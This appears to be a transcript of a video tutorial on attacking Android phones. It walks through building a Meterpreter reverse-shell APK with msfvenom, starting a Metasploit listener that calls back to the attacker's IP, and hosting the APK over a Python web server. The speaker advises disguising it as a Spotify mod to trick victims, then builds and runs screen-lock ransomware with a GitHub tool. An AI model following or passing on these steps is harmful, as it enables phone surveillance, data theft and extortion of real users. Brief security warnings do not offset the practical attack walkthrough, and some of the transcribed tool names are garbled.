it will be ready for the installation process. So I'm going to install this app from here to here. Let's see how to do. ADB install. Now it's asking success. So see, this is insecure app. I can easily install from here and there because I already make a connection from my system to the Android device. So it will be very useful to install app without knowledge for the end user. If you updated this thing, your Android, it will not gonna happen. So make sure you are having up to date softwares. So first method is fine. I'm going to make one. I already make one malware app for this demo. We will reverse engineering this. What are the things inside we can analyze. So already I done. That's why it's asking one more. It have to overwrite. This is the malware. Every mobile application have Android manifest file, but it will be differ for the native apps as well as the hybrid apps, because native apps only develop for Android or only develop for iOS, but hybrid is totally different because once we develop the hybrid apps, it will be install Android mobile phones as well as iOS Apple mobile phone. That's why it will be very efficient for the Android developers nowadays. So we'll get this. See, it have lot of permission because it is a malware file. So it will ask all the permission while installing in our mobile phones. This much permission it will be asked while installing in our mobile application. It is asking internet and Wi-Fi state, change Wi-Fi state, network access, access for the location, as well as sending SMS, receiving SMS, recording audio, cell phone call history, contact. It also see, it also read the contact. It is also able to write the contact. It is also change the settings and camera, read the SMS, all the call log. It can also read the call log. It can also write the call log. All those stuff. It's asking permission because this is a malware mobile application. I will show you how to create this now. We'll test whether any export is true here. Here also. Okay. See, there is no Kotlin file because I created this using MSF Venom, which is the comes under the Metasploitable sorry, Metasploit framework. Okay, we will create one malware file then. This is the second method. We can compromise the system. I will show you how to do it. How to do this. MSF Venom hyphen P. P stand for payload. Metapreter. Usually we use a Metapreter for opening a session. It will be useful to access the thing from here. So we have to set the local host. Local host is nothing your system, because you have to monitor which system you are gonna do monitor. That IP address you have to give. So my IP address is host equal to 192.168.0.128. You can see if conflict. This is my IP address. So I gave here, and we have to mention a port number, local port. It will send the data through this port. I'm going to mention port of port. The output file should be in temp folder. So we know very well the Spotify company was removed the modified app. So we have to think psychologically whether if I having a original victim, so they used Spotify mod app. Now they are not using because the officially they are removed that thing. So I'm gonna create a Spotify mod app now. So they will easily install this thing without thinking prior. So now the payload size is 10233 byte, and it will save here. So I'm going to open this 10. I'm gonna move this from here to my desktop. Just no such file directory. I don't know why it is not. Okay, guys, something went wrong, but no issues. I already have this malware application. It is also I created like this. So I will go with this malware application. Now I am going to start a Metasploit MS console. So this is the Metasploit framework. We can use multi-handler to capture the session, and we can access the Android system from here. So it will configure the payload this, but we have to set a payload what we configured in the malicious app. So we used a metapreter there, so we have to set here. Yes, fine. Then I'm going to set our lhost, rhost to C, and now L port port 4. That's it, guys. We can exploit this. It will start the listener. We can configure this thing. Okay. So set lhost 192.168.0.128. Set lport for exploit. Yeah, now this is started to listen this port, and we got one session here because already our machine have this malware. Using the ADB tool, we can install this thing, install this malware app in the target machine as before we did. Once the user click the malicious app, it will leads to open the Metapreter session here. See, now I'm going to click this. Another method also is there to install this app. I will show for the ransomware. It will be very useful to download in your mobile phone also. We can do the live practical over there. So what I'm going to do is Python 3 -m method http dot server on the port number 8080. It will start this thing. So we can access this link from any device. So http 192.168.0.128. This is my, sorry, http 92.168.0.128. This is my localhost IP and the port number is 8080. So I can able to access this. See, the logs are coming here. So I want to install this app, but it won't allow because it is harmful. The name is differ. Instead of malware.apk, we have to give Spotify or Instagram, whatever it is, we can give. Let's open this thing. See, the Chrome will not allow this app to install because this is a unknown app. We can change the setting here. And give install. App not installed because the Chrome will block the malicious app. But that's when I already installed that. You can try one more. Can Nasaflanam localhost. Okay, we will go through this. Go with this. Sorry. Okay, fine. I will move to ransomware attack. So ransomware is usually what it will do means it will encrypt our data which are all available in our mobile phones or laptop. The hackers will mainly concentrate the big enterprises to encrypt the data. Then they will demand some money from them. So it is totally illegal because if we did a ransomware attack, it will ask password. with the password we will decrypt the encrypted data, but the hacker will don't reveal the password because it will be very strong password. We couldn't able to make brute force the passwords. So before affecting with the ransomware, adware, uh, be precaution before affecting from that. Ransomware we use, actually I use Sara tool. It will be available in GitHub. It is only built for Android ransomware. So we can able to create three types of ransomware here. One is Metasploit and one is file locker. Before that, I was said right. It will encrypt all the data. So this is screen lock. I'm going to show this is the screen lock. It will be very easy to understand the concept. So I am going to tell this name Spotify. Here we have to give a password. I will give them Spotify. So it will generate, create the mobile application using APK tool. So it will be very easy to do reverse engineering as well as rebuild the application. So it use APK tool. It asks now you want to upload this file or not. I'm going to say yes. I need to upload. It will give some link here. If it is didn't give, it's fine. We can install through ADB. So here we have the Spotify app. I'm going to move this to desktop. So now we can get able to see this. I'm gonna do the same thing. Install using ADB. It will ask some permission. See, this is harmful app, but we can install anyway. Don't give like this. If any app asking like this, don't give. I'm just giving this for testing purpose. If I send this to the security check, it will block this app. Before our malware app was blocked, right? Like that, it will block our. So I'm not gonna send this. Now it's successfully installed. That is Spotify. Here the Spotify. Now I will click this. It will lock my screen, not encrypt all the data, all the files you are seeing here. It will only lock the screen. See, now we can't able to do anything. Nothing gonna happen. So hacker will do like this. This is a testing device, and I did only the lock for the screen. Just think how the hackers will encrypt all the data from the big MNCs, big hospitals, big educational things. It will leads to big sorry, reputation damage, as well as the data of every individual will be encrypted. So their business gonna flop. That's why they are doing like this. So the commitment amount is very huge. The target also very huge. So they will commit a big amount for them to give just a single password. So this is very dangerous attack. There is a blue team and a incident response team in a company to prevent all the malwares from their network. If any of the system affected by any kind of malware like this ransomware, they will separate all the system which are affected in the network, and they will try to recover all the data, like doing brute force attack and trying to decrypt the data, because it will move all the system which are all connected in the network, and it will encrypt all the system, like a worm virus. There is a virus worm, it will multiply by themselves. So now after I'm using Spotify. Before that, I'm going to restart this mission. After restart, reboot, anything will work out. Once it is injected, it is injected. Also, the updated Android version or ISO also get compromised through this ransomware malware, because it is more powerful. See, still the same state when I was logged off from my system. It will be there. You are not do anything here because the screen was locked. If I put Spotify here, the password which was I given while creating this malware, see, it will open. Now I can do anything. This is the power of ransomware. Why was this? Okay, now it is clear. So the third thing is I'm going to put a pattern password, and I will gonna show off how to bypass the pattern password in this Android machine.